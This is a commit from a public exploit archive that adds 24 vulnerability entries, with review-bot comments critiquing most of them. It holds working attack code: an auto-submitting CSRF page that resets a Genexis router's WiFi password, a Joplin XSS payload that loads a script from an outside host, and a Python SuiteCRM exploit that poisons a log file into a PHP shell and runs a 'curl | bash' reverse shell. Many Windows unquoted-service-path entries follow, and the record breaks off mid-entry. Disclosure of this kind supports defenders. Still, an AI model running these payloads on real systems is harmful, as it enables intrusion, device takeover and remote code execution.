DB: 2020-11-10

24 changes to exploits/shellcodes

HP Display Assistant x64 Edition 3.20 - 'DTSRVC' Unquoted Service Path
KMSpico 17.1.0.0 - 'Service KMSELDI' Unquoted Service Path
Winstep 18.06.0096 - 'Xtreme Service' Unquoted Service Path
OKI sPSV Port Manager 1.0.41 - 'sPSVOpLclSrv' Unquoted Service Path
IPTInstaller 4.0.9 - 'PassThru Service' Unquoted Service Path
Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path
DigitalPersona 4.5.0.2213 - 'DpHostW' Unquoted Service Path
Syncplify.me Server! 5.0.37 - 'SMWebRestServicev5' Unquoted Service Path
HP WMI Service 1.4.8.0 - 'HPWMISVC.exe' Unquoted Service Path
Motorola Device Manager 2.4.5 - 'ForwardDaemon.exe ' Unquoted Service Path
Motorola Device Manager 2.5.4 - 'MotoHelperService.exe' Unquoted Service Path
Motorola Device Manager 2.5.4 - 'ForwardDaemon.exe ' Unquoted Service Path
Realtek Andrea RT Filters 1.0.64.10 - 'AERTSr64.EXE' Unquoted Service Path
MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path
Magic Mouse 2 utilities  2.20 - 'magicmouse2service' Unquoted Service Path
iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path
Canon Inkjet Extended Survey Program 5.1.0.8 - 'IJPLMSVC.EXE'  - Unquoted Service Path
Deep Instinct Windows Agent 1.2.24.0 - 'DeepNetworkService' Unquoted Service Path
RealTimes Desktop Service 18.1.4 - 'rpdsvc.exe' Unquoted Service Path
DiskBoss v11.7.28 - Multiple Services Unquoted Service Path
Privacy Drive v3.17.0 - 'pdsvc.exe' Unquoted Service Path
Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF
SuiteCRM 7.11.15 - 'last_name' Remote Code Execution (Authenticated)
Joplin 1.2.6 - 'link' Cross Site Scripting
Offensive Security 2020-11-10 05:02:05 +00:00
parent 690eb17718
commit e797f5230d
25 changed files with 1012 additions and 0 deletions

@ -0,0 +1,90 @@
# Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF
# Date: 28-08-2020
# Vendor Homepage: https://www.gxgroup.eu/ont-products/
# Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)
# Author Advisory: https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/
# Version: v2.1 (software version P4410-V2-1.28)
# CVE : CVE-2020-25015
1. Description
Platinum 4410 is a compact router from Genexis that is commonly used at homes and offices. Hardware version V2.1 Software version P4410-V2-1.28 was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access points password.
2. Impact
An attacker can send the victim a link, which if he clicks while he is connected to the WiFi network established from the vulnerable router, the password of the WIFI access point will get changed via CSRF exploit. As the router is also vulnerable to Broken Access Control, the victim does not need to be logged in to the routers web-based setup page (192.168.1.1), essentially making this a one-click hack.
3. Proof of Concept
Create an HTML file with the following code:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/cgi-bin/net-wlan.asp" method="POST">
<input type="hidden" name="wlEnbl" value="ON" />
<input type="hidden" name="hwlKeys0" value="" />
<input type="hidden" name="hwlKeys1" value="" />
<input type="hidden" name="hwlKeys2" value="" />
<input type="hidden" name="hwlKeys3" value="" />
<input type="hidden" name="hwlgMode" value="9" />
<input type="hidden" name="hwlAuthMode" value="WPAPSKWPA2PSK" />
<input type="hidden" name="hwlEnbl" value="1" />
<input type="hidden" name="hWPSMode" value="1" />
<input type="hidden" name="henableSsid" value="1" />
<input type="hidden" name="hwlHide" value="0" />
<input type="hidden" name="isInWPSing" value="0" />
<input type="hidden" name="WpsConfModeAll" value="7" />
<input type="hidden" name="WpsConfModeNone" value="0" />
<input type="hidden" name="hWpsStart" value="0" />
<input type="hidden" name="isCUCSupport" value="0" />
<input type="hidden" name="SSIDPre" value="N&#47;A" />
<input type="hidden" name="bwControlhidden" value="0" />
<input type="hidden" name="ht&#95;bw" value="1" />
<input type="hidden" name="wlgMode" value="b&#44;g&#44;n" />
<input type="hidden" name="wlChannel" value="0" />
<input type="hidden" name="wlTxPwr" value="1" />
<input type="hidden" name="wlSsidIdx" value="0" />
<input type="hidden" name="SSID&#95;Flag" value="0" />
<input type="hidden" name="wlSsid" value="JINSON" />
<input type="hidden" name="wlMcs" value="33" />
<input type="hidden" name="bwControl" value="1" />
<input type="hidden" name="giControl" value="1" />
<input type="hidden" name="enableSsid" value="on" />
<input type="hidden" name="wlAssociateNum" value="32" />
<input type="hidden" name="wlSecurMode" value="WPAand11i" />
<input type="hidden" name="wlPreauth" value="off" />
<input type="hidden" name="wlNetReauth" value="1" />
<input type="hidden" name="wlWpaPsk" value="NEWPASSWORD" />
<input type="hidden" name="cb&#95;enablshowpsw" value="on" />
<input type="hidden" name="wlWpaGtkRekey" value="" />
<input type="hidden" name="wlRadiusIPAddr" value="" />
<input type="hidden" name="wlRadiusPort" value="" />
<input type="hidden" name="wlRadiusKey" value="" />
<input type="hidden" name="wlWpa" value="TKIPAES" />
<input type="hidden" name="wlKeyBit" value="64" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="WpsActive" value="0" />
<input type="hidden" name="wpsmode" value="ap&#45;pbc" />
<input type="hidden" name="pinvalue" value="" />
<input type="hidden" name="Save&#95;Flag" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Open this file in a browser while you are connected to the WIFI. There is no need for the victim to be logged in to the Router admin panel (192.168.1.1). It can be seen that the WIFI connection is dropped. To reconnect, forget the WIFI connection on your laptop or phone and connect using the newly changed password: NEWPASSWORD
4. PoC Video: https://www.youtube.com/watch?v=nSu5ANDH2Rk&feature=emb_title
3. Timeline
Vulnerability reported to the Genexis team August 28, 2020
Team confirmed firmware release containing fix September 14, 2020
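Review bot: The Timeline says a firmware release containing the fix was confirmed on September 14, 2020, but no fixed version is named anywhere, while the header lists only the affected build (P4410-V2-1.28). Add the fixed firmware version so owners can tell whether their device is still exposed. The section numbering also goes 1, 2, 3, 4, 3, so the Timeline should be section 5, and the Description would be clearer if it stated the two conditions the form makes visible: /cgi-bin/net-wlan.asp accepts a state-changing POST without a session and without an anti-CSRF token.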

@ -0,0 +1,23 @@
# Exploit Title: Joplin 1.2.6 - 'link' Cross Site Scripting
# Date: 2020-09-21
# Exploit Author: Philip Holbrook (@fhlipZero)
# Vendor Homepage: https://joplinapp.org/
# Software Link: https://github.com/laurent22/joplin/releases/tag/v1.2.6
# Version: 1.2.6
# Tested on: Windows / Mac
# CVE : CVE-2020-28249
# References:
# https://github.com/fhlip0/JopinXSS/blob/main/readme.md
# 1. Technical Details
# An XSS issue in Joplin for desktop v1.2.6 allows a link tag in a note to
bypass the HTML filter
# 2. PoC
# Paste the following payload into a note:
```
<link rel=import
href="data:text/html&comma;<script>alert(XSS)<&sol;script>
<script src="//brutelogic.com.br&sol;1.js&num; </script>
```
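Review bot: The payload in section 2 references a script on a third-party host (the line beginning `<script src="//brutelogic.com.br`), so anyone reproducing the issue loads remote code they do not control into the note renderer; a self-contained payload is enough to show the filter bypass, and the external reference should be dropped. The line `bypass the HTML filter` is a continuation of the `#` comment above it but has lost its `#`, and the entry names no fixed Joplin release.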

exploits/php/webapps/49001.py Executable file

@ -0,0 +1,113 @@
# Exploit Title: SuiteCRM 7.11.15 - 'last_name' Remote Code Execution (Authenticated)
# Date: 08 NOV 2020
# Exploit Author: M. Cory Billington (@_th3y)
# Vendor Homepage: https://suitecrm.com/
# Software Link: https://github.com/salesagility/SuiteCRM
# Version: 7.11.15 and below
# Tested on: Ubuntu 20.04 LTS
# CVE: CVE-2020-28328
# Writeup: https://github.com/mcorybillington/SuiteCRM-RCE
from requests import Session
from random import choice
from string import ascii_lowercase
url = "http://127.0.0.1/" # URL to remote host web root
post_url = "{url}index.php".format(url=url)
user_name = "admin" # User must be an administrator
password = "admin"
prefix = 'shell-'
file_name = '{prefix}{rand}.php'.format(
prefix=prefix,
rand=''.join(choice(ascii_lowercase) for _ in range(6))
)
# *Recommend K.I.S.S as some characters are escaped*
# Example for reverse shell:
# Put 'bash -c '(bash -i >& /dev/tcp/127.0.0.1/8080 0>&1)&' inside a file named shell.sh
# Stand up a python web server `python -m http.server 80` hosting shell.sh
# Set a nc listener to catch the shell 'nc -nlvp 8080'
command = '<?php `curl -s http://127.0.0.1/shell.sh | bash`; ?>'.format(fname=file_name)
# Admin login payload
login_data = {
"module": "Users",
"action": "Authenticate",
"return_module": "Users",
"return_action": "Login",
"user_name": user_name,
"username_password": password,
"Login": "Log+In"
}
# Payload to set logging to 'info' and create a log file in php format.
modify_system_settings_data = {
"action": (None, "SaveConfig"),
"module": (None, "Configurator"),
"logger_file_name": (None, file_name), # Set file extension in the file name as it isn't checked here
"logger_file_ext": (None, ''), # Bypasses file extension check by just not setting one.
"logger_level": (None, "info"), # This is important for your php code to make it into the logs
"save": (None, "Save")
}
# Payload to put php code into the malicious log file
poison_log = {
"module": (None, "Users"),
"record": (None, "1"),
"action": (None, "Save"),
"page": (None, "EditView"),
"return_action": (None, "DetailView"),
"user_name": (None, user_name),
"last_name": (None, command),
}
# Payload to restore the log file settings to default after the exploit runs
restore_log = {
"action": (None, "SaveConfig"),
"module": (None, "Configurator"),
"logger_file_name": (None, "suitecrm"), # Default log file name
"logger_file_ext": (None, ".log"), # Default log file extension
"logger_level": (None, "fatal"), # Default log file setting
"save": (None, "Save")
}
# Start of exploit
with Session() as s:
# Authenticating as the administrator
s.get(post_url, params={'module': 'Users', 'action': 'Login'})
print('[+] Got initial PHPSESSID:', s.cookies.get_dict()['PHPSESSID'])
s.post(post_url, data=login_data)
if 'ck_login_id_20' not in s.cookies.get_dict().keys():
print('[-] Invalid password for: {user}'.format(user=user_name))
exit(1)
print('[+] Authenticated as: {user}. PHPSESSID: {cookie}'.format(
user=user_name,
cookie=s.cookies.get_dict()['PHPSESSID'])
)
# Modify the system settings to set logging to 'info' and create a log file in php format
print('[+] Modifying log level and log file name.')
print('[+] File name will be: {fname}'.format(fname=file_name))
settings_header = {'Referer': '{url}?module=Configurator&action=EditView'.format(url=url)}
s.post(post_url, headers=settings_header, files=modify_system_settings_data)
# Post to update the administrator's last name with php code that will poison the log file
print('[+] Poisoning log file with php code: {cmd}'.format(cmd=command))
command_header = {'Referer': '{url}?module=Configurator&action=EditView'.format(url=url)}
s.post(url, headers=command_header, files=poison_log)
# May be a good idea to put a short delay in here to allow your code to make it into the logfile.
# Up to you though...
# Do a get request to trigger php code execution.
print('[+] Executing code. Sending GET request to: {url}{fname}'.format(url=url, fname=file_name))
execute_command = s.get('{url}/{fname}'.format(url=url, fname=file_name), timeout=1)
if not execute_command.ok:
print('[-] Exploit failed, sorry... Might have to do some modifications.')
# Restoring log file to default
print('[+] Setting log back to defaults')
s.post(post_url, headers=settings_header, files=restore_log)
print('[+] Done. Clean up {fname} if you care...'.format(fname=file_name))
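Review bot: The restore step at the end is not guaranteed to run: the trigger request uses `timeout=1` and nothing visible here catches the exception requests raises on a timeout, so a slow response ends the script with the logger still at level `info` and still pointed at a `.php` file name. Put the `restore_log` POST in a `finally` block and document removal of the created file as a required step rather than "if you care", so a test does not leave the target exposed. Smaller points: `.format(fname=file_name)` on the `command` string has no `{fname}` placeholder, and the header should name the fixed SuiteCRM release, since "7.11.15 and below" only bounds the affected range.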

@ -0,0 +1,39 @@
# Exploit Title: HP Display Assistant x64 Edition 3.20 - 'DTSRVC' Unquoted Service Path
# Date: 2020-11-08
# Exploit Author: Julio Aviña
# Vendor Homepage: https://www.portrait.com/
# Software Link: https://www.portrait.com/dtune/hwp/enu/
# Software Version: 3.20
# File Version: 1.0.0.1
# Tested on: Windows 10 Pro x64 es
# Vulnerability Type: Unquoted Service Path
# 1. To find the unquoted service path vulnerability
C:\>wmic service where 'name like "%DTSRVC%"' get name, displayname, pathname, startmode, startname
DisplayName Name PathName StartMode StartName
Portrait Displays Display Tune Service DTSRVC C:\Program Files (x86)\Common Files\Portrait Displays\Shared\dtsrvc.exe Auto LocalSystem
# 2. To check service info:
C:\>sc qc "DTSRVC"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: DTSRVC
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Common Files\Portrait Displays\Shared\dtsrvc.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Portrait Displays Display Tune Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# 3. Exploit:
A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
When restarting the service or the system, the inserted executable will run with elevated privileges.
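Review bot: Step 3 asserts that an executable can be inserted into the service path, but the entry shows no permission check for any directory above `dtsrvc.exe`; default ACLs on Program Files do not give standard users write access, so the impact is conditional on a non-default permission. Include the ACL output for the parent directories that was used to confirm the finding, or word the impact as conditional. The entry should also give the remediation, which is to wrap NOMBRE_RUTA_BINARIO in double quotes.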

@ -0,0 +1,24 @@
#Exploit Title: KMSpico 17.1.0.0 - 'Service KMSELDI' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-08
#Vendor : KMSpico
#Version : Service_KMS 17.1.0.0
#Vendor Homepage : https://official-kmspico.com/
#Tested on OS: Windows 7 Pro
#Analyze PoC :
==============
C:\>sc qc "Service KMSELDI"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: Service KMSELDI
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\KMSpico\Service_KMS.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Service KMSELDI
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
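Review bot: The entry stops at the `sc qc` output and never says what the finding is: there is no discovery step, no impact statement and no Software Link. Add a sentence tying NOMBRE_RUTA_BINARIO (unquoted) and NOMBRE_INICIO_SERVICIO (LocalSystem) to the claimed issue. The only space in the path is the one in `Program Files`, so the impact depends on a non-default write permission that the entry should state.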

@ -0,0 +1,24 @@
#Exploit Title: Winstep 18.06.0096 - 'Xtreme Service' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-08
#Vendor : Winstep
#Version : WsxService 18.06.0096
#Vendor Homepage : https://www.winstep.net/xtreme.asp
#Tested on OS: Windows 7 Pro
#Analyze PoC :
==============
C:\>sc qc "Winstep Xtreme Service"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: Winstep Xtreme Service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Winstep\WsxService
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Winstep Xtreme Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
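Review bot: NOMBRE_RUTA_BINARIO is shown as `C:\Program Files\Winstep\WsxService` with no file extension, unlike the binary paths in the other entries of this commit. Confirm whether the service is really registered that way or the output was cut when pasted, and show the path exactly as `sc qc` printed it.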

@ -0,0 +1,39 @@
# Exploit Title: OKI sPSV Port Manager 1.0.41 - 'sPSVOpLclSrv' Unquoted Service Path
# Date: 2020-11-08
# Exploit Author: Julio Aviña
# Vendor Homepage: https://www.oki.com/
# Software Link: https://www.oki.com/mx/printing/download/sPSV_010041_2_270910.exe
# Software Version: 1.0.41
# File Version: 1.4.2.0
# Tested on: Windows 10 Pro x64 es
# Vulnerability Type: Unquoted Service Path
# 1. To find the unquoted service path vulnerability
C:\>wmic service where 'name like "%sPSVOpLclSrv%"' get displayname, pathname, startmode, startname
DisplayName PathName StartMode StartName
OKI sPSV Port Manager C:\Program Files\Okidata\smart PrintSuperVision\xml\ComApi\extend3\portmgrsrv.exe Auto LocalSystem
# 2. To check service info:
C:\>sc qc "sPSVOpLclSrv"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: sPSVOpLclSrv
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Okidata\smart PrintSuperVision\xml\ComApi\extend3\portmgrsrv.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : OKI sPSV Port Manager
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# 3. Exploit:
A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
When restarting the service or the system, the inserted executable will run with elevated privileges.

@ -0,0 +1,27 @@
#Exploit Title: IPTInstaller 4.0.9 - 'PassThru Service' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-08
#Vendor : HTC
#Version : IPTInstaller 4.0.9
#Vendor Homepage : https://www.htc.com/latam/
#Tested on OS: Windows 7 Pro
#Analyze PoC :
==============
C:\Users\DSAZ230>sc qc "PassThru Service"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: PassThru Service
TIPO : 10
[image: PassThruserv.jpg]
WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\HTC\Internet
Pass-Through\PassThruSvr.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Internet Pass-Through Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
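Review bot: An e-mail image placeholder, `[image: PassThruserv.jpg]`, sits inside the `sc qc` output between `TIPO : 10` and `WIN32_OWN_PROCESS`, and NOMBRE_RUTA_BINARIO is wrapped after `Internet`, so the one value this entry exists to show cannot be read as a single path. Remove the placeholder and put the binary path on one line. The prompt also exposes a local account name (`C:\Users\DSAZ230>`); `C:\>` is enough.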

@ -0,0 +1,27 @@
#Exploit Title: Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path
Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-08
#Vendor : Genexus
#Version : Genexus Protection Server 9.6.4.2
#Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;;
#Vendor Homepage : https://www.genexus.com/es/
#Tested on OS: Windows 10 Pro
#Analyze PoC :
==============
C:\>sc qc protsrvservice
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: protsrvservice
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Common
Files\Artech\GXProt1\ProtSrv.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : ProtSrvService
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem
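Review bot: The second line of the file, `Service Path`, is a wrapped fragment of the title and is not commented out, and NOMBRE_RUTA_BINARIO is split after `Common`. Delete the fragment and rejoin the path so it reads as one value. The Software Link ends in `?data=;;`, which looks like a leftover query string; link the download page itself.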

@ -0,0 +1,25 @@
#Exploit Title: DigitalPersona 4.5.0.2213 - 'DpHostW' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-08
#Vendor : DigitalPersona U. are U. One Touch
#Version : DigitalPersona Pro 4.5.0.2213
#Vendor Homepage : https://www.hidglobal.com/crossmatch
#Tested on OS: Windows 10 Home
#Analyze PoC :
==============
C:\>sc qc DpHost
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: DpHost
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files
(x86)\DigitalPersona\Bin\DpHostW.exe
GRUPO_ORDEN_CARGA : BiometricGroup
ETIQUETA : 0
NOMBRE_MOSTRAR : Servicio de autenticación biométrica
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem
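Review bot: The title quotes 'DpHostW', but the service queried and reported by `sc qc` is `DpHost`; `DpHostW.exe` is only the binary name. Use the service name in the title so the entry can be matched against a service inventory. The Vendor field (`DigitalPersona U. are U. One Touch`) also reads as a product name while the homepage is hidglobal.com; name the vendor.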

@ -0,0 +1,38 @@
# Exploit Title: Syncplify.me Server! 5.0.37 - 'SMWebRestServicev5' Unquoted Service Path
# Date: 2020-11-08
# Exploit Author: Julio Aviña
# Vendor Homepage: https://www.syncplify.me/
# Software Link: https://download.syncplify.me/SMServer_Setup.exe
# Version: 5.0.37
# Tested on: Windows 10 Pro x64 es
# Vulnerability Type: Unquoted Service Path
# 1. To find the unquoted service path vulnerability
C:\>wmic service where 'name like "%SMWebRestServicev5%"' get displayname, pathname, startmode, startname
DisplayName PathName StartMode StartName
Syncplify.me Web/REST Server! v5 C:\Program Files\Syncplify\Syncplify.me Server!\SMWebRestSvc.exe Auto LocalSystem
# 2. To check service info:
C:\>sc qc "SMWebRestServicev5"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: SMWebRestServicev5
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Syncplify\Syncplify.me Server!\SMWebRestSvc.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Syncplify.me Web/REST Server! v5
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# 3. Exploit:
A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
When restarting the service or the system, the inserted executable will run with elevated privileges.

@ -0,0 +1,40 @@
#Exploit Title: HP WMI Service 1.4.8.0 - 'HPWMISVC.exe' Unquoted Service Path
#Discovery by: Jocelyn Arenas
#Discovery Date: 2020-11-07
#Vendor Homepage: https://www8.hp.com/mx/es/home.html
#Tested Version: 1.4.8.0
#Vulnerability Type: Unquoted Service Path
#Tested on OS: Windows 10 Home x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\windows\\" | findstr /i /v """
HPWMISVC HPWMISVC c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe Auto
#Service info:
C:\>sc qc HPWMISVC
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME : HPWMISVC
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : HPWMISVC
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security
applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with
the elevated privileges of the application.
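Review bot: The exploit paragraph says the code must be placed "in the system root path", but the system root is C:\Windows, which the discovery command explicitly excludes with `findstr /i /v "C:\windows\\"`; the binary is under `c:\Program Files (x86)\HP\HP System Event`. Reword it to refer to the parent directories of BINARY_PATH_NAME and state which of them, if any, was found writable by a standard user. TYPE is `110 WIN32_OWN_PROCESS (interactive)`, which is worth a sentence as well, since the service is allowed to interact with the desktop.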

@ -0,0 +1,48 @@
# Exploit Title: Motorola Device Manager 2.4.5 - 'ForwardDaemon.exe ' Unquoted Service Path
# Discovery by: Angel Canseco
# Discovery Date: 2020-11-08
# Vendor Homepage: https://www.filehorse.com/es/descargar-motorola-device-manager/
# Tested Version: 2.4.5
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i
"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "PST Service " |
findstr /i /v """
Motorola Device Manager C:\Program Files (x86)\Motorola Mobility\Motorola
Device Manager\MotoHelperService.exe
Auto
# Service info:
PST Service C:\Program Files
(x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
Auto
C:\>sc qc "PST Service"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: PST Service
TIPO : 110 WIN32_OWN_PROCESS (interactive)
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files
(x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : PST Service
DEPENDENCIAS : lanmanworkstation
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt would cause the local user to be able to insert their
code in the system root path
undetected by the OS or other security applications and elevate his
privileges after reboot.
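Review bot: The output placed under the discovery command does not match it: the command filters on `findstr /i "PST Service "`, yet the lines that follow show Motorola Device Manager and MotoHelperService.exe, while the PST Service / ForwardDaemon.exe line appears further down under `# Service info:`. Move the PST Service line up under the command and drop the MotoHelperService output, which belongs to a different service. The title also carries a stray trailing space inside the quotes (`'ForwardDaemon.exe '`).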

@ -0,0 +1,44 @@
# Exploit Title: Motorola Device Manager 2.5.4 - 'MotoHelperService.exe' Unquoted Service Path
# Discovery by: Angel Canseco
# Discovery Date: 2020-11-07
# Vendor Homepage: https://motorola-device-manager.programas-gratis.net/descarga-completada
# Tested Version: 2.5.4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i
"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "MotoHelperService " |
findstr /i /v """
Motorola Device Manager Service
Motorola Device Manager C:\Program Files (x86)\Motorola Mobility\Motorola
Device Manager\MotoHelperService.exe
Auto
# Service info:
C:\>sc qc "Motorola Device Manager"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: Motorola Device Manager
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Motorola
Mobility\Motorola Device Manager\MotoHelperService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Motorola Device Manager Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt would cause the local user to be able to insert their
code in the system root path
undetected by the OS or other security applications and elevate his
privileges after reboot.
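Review bot: Vendor Homepage points to a third-party download page (motorola-device-manager.programas-gratis.net) rather than to Motorola, so the origin of the tested installer cannot be verified from this entry. Give the vendor's own URL, and if the build was obtained from a mirror, say so. The wrapped `wmic` output also leaves `Motorola Device Manager Service` on a line by itself; keep each service record on one line.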

@ -0,0 +1,40 @@
# Exploit Title: Motorola Device Manager 2.5.4 - 'ForwardDaemon.exe 'Unquoted Service Path
# Discovery by: Angel Canseco
# Discovery Date: 2020-11-07
# Vendor Homepage: https://motorola-device-manager.programas-gratis.net/gracias
# Tested Version: 2.5.4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i
"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ForwardDaemon" |
findstr /i /v """
PST Service C:\Program Files
(x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
Auto
C:\Users\MISTI>sc qc "PST Service"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: PST Service
TIPO : 110 WIN32_OWN_PROCESS (interactive)
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files
(x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : PST Service
DEPENDENCIAS : lanmanworkstation
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt would cause the local user to be able to insert their
code in the system root path
undetected by the OS or other security applications and elevate his
privileges after reboot.
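Review bot: This entry reports the same service (`PST Service`) with the same NOMBRE_RUTA_BINARIO and the same exploit text as the Motorola Device Manager 2.4.5 entry in this commit, differing only in the Tested Version. Merge the two into one entry that lists both versions. The title is also missing a space before `Unquoted` (`'ForwardDaemon.exe 'Unquoted`).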

@ -0,0 +1,34 @@
# Exploit Title: Realtek Andrea RT Filters 1.0.64.10 - 'AERTSr64.EXE' Unquoted Service Path
# Discovery by: Erika Figueroa
# Discovery Date: 2020-11-07
# Vendor Homepage: https://www.realtek.com/en/
# Tested Version: 1.0.64.10
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 8.1 x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i /v """
Andrea RT Filters Service AERTFilters C:\Program Files\Realtek\Audio\HDA\AERTSr64.EXE Auto
# Service info:
C:\>sc qc "AERTFilters"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: AERTFilters
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
